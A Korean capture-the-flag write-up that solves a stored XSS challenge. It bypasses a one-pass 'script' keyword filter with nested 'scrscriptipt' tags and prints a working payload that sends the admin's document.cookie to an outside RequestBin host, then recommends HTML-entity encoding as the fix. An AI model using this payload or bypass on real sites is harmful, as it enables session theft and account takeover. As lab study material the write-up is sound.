[SegFault] (XSS) - XSS 4

[SegFault] (XSS)

XSS 4

관리자의 Cookie를 탈취하세요!

문제 파악

본 문제의 경우 XSS의 취약점을 찾고, 관리자 Bot에 해당 링크를 입력하여 공격자 서버로 Cookie 값을 탈취하여 받으면 Flag를 획득할 수 있는 방식으로 이루어져 있다.

하지만 현재 공격자 서버를 갖고 있지 않으므로 RequestBin을 이용하기로 한다.

우선 위의 [관리자 방문 Bot Link]에 접속하면 다음과 같은 URL 입력창을 볼 수 있다.

XSS 취약점을 발견하고 해당 링크를 위의 URL에 입력하면 공격자 서버(RequestBin)로 쿠키 값이 날아오는 방식이다.

이제 아래의 문제 링크에 접속하면 다음과 같은 창이 나온다.

우선 회원가입 후 로그인을 시도해본다.

마이페이지에는 XSS 취약점이 없다고 판단되어 공지사항을 확인해본다.

검색 기능에 대해서는 취약점이 발견되지 않아 글쓰기를 이용하여 스크립트 삽입 가능 여부를 확인한다.

 

XSS Point

스크립트에 이용 가능한 특수문자를 확인해보기 위해 다음과 같이 입력하여 글을 작성해본다.

< ' " >

위와 같이 글을 작성하고 확인해본다.

이를 Burp를 이용하여 확인해보면 다음과 같이 < ' " > 이 그대로 출력되는 것을 확인할 수 있다.

이제 스크립트를 삽입 가능한지 확인해보기 위해 <script>를 입력하여 확인해본다.

위와 같이 글을 수정한 후 해당 글에 접근해보면 다음과 같이 script 라는 단어가 사라져서 나오는 것을 확인할 수 있다.

위와 같이 Burp로 확인해본 결과 script라는 단어 자체가 공백 문자로 변환된 것을 확인할 수 있다.

이를 우회하기 위해 script 문자 사이에 script라는 단어를 한번 더 넣어 확인해본다.

scrscriptipt

위와 같이 작성된 글에 접근해보면 다음과 같이 스크립트가 활성화되어 내용이 보이지 않는 것을 확인할 수 있다.

위와 같이 글의 제목이나 내용에 스크립트가 삽입 가능한 것을 확인하였다.

---

풀이 과정 (해결 방안)

글의 내용에 삽입할 쿠키 탈취를 위한 페이로드(Payload)를 작성한다.

페이로드 (Payload)

<scrscriptipt>
var cookieData = document.cookie;
var i = new Image();
i.src = "https://eneqijtbrtwyr.x.pipedream.net/?cookie="+cookieData;
</scrscriptipt>

 

스크립트 삽입

위와 같이 글의 내용 부분에 해당 페이로드(Paylaod)를 삽입해준다.

해당 글을 읽기 위해 접근하는 경우에 내용 부분의 스크립트가 활성화 되어 화면에는 내용이 출력되지 않지만 저장되어 있는 스크립트가 실행되는 것을 확인할 수 있다.

해당 글의 URL을 관리자 Bot에 보내준다.

탈취된 쿠키(Cookie)가 공격자의 주소(RequestBin)으로 받아와 지는 것을 확인할 수 있다.

위와 같이 해당 글에 접근하여 스크립트가 활성화되어 원하는 flag가 획득되는 것을 확인할 수 있다.

---

취약점에 관한 고찰

본 문제의 경우 특정문자에 대한 필터링이 script와 같이 붙어있는 형태에 한하여 한번만 진행되어 scrscriptipt와 같이 필터링 문자 사이에 필터링되는 문자를 삽입하는 경우 중간의 문자만 공백문자로 변환되고 앞 뒤의 문자가 붙어 script 라는 단어가 만들어져 필터링의 효과를 상실하는 점을 이용한다.
위의 필터링 우회를 통해 응답(Response)에 작성되어 있는 제목과 내용이 그대로 출력되는 점을 이용한 Stored XSS 취약점이다.

잘못된 필터링 방식은 우회가 가능하다는 것을 알 수 있는 문제이다.
< ' " > 와 같은 특수문자의 경우 HTML 특수코드(HTML Entity)로 변환하여 스크립트 실행에 영향을 줄 수 있는 태그(tag)와 혼용되는 것을 방지하기 위해 문자열로서만 인식되도록 구현해야한다.

---

질문 환영, 수정 및 보완에 대한 지적 환영